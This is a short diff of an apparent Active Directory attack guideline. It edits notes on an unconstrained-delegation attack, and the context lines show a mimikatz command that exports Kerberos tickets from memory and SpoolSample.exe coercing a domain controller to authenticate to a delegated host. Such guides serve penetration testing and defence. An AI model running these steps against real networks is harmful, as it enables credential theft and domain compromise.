vanhohen/ADNinja/Guideline.md

 	SID                  : S-1-5-21-3410397846-649609989-2919355437-2124
 	TrustedForDelegation : True
 	UserPrincipalName    :

-	PS C:\Users\Administrator>

-Check in memory TGT with
+Check in memory TGT with, there is no TGT in memory

 	sekurlsa::tickets /export

-force DC to authenticate pc-win10
+Force DC to authenticate pc-win10

 	PS C:\Users\testuser\Desktop> .\SpoolSample.exe odin pc-win10
 	[+] Converted DLL to shellcode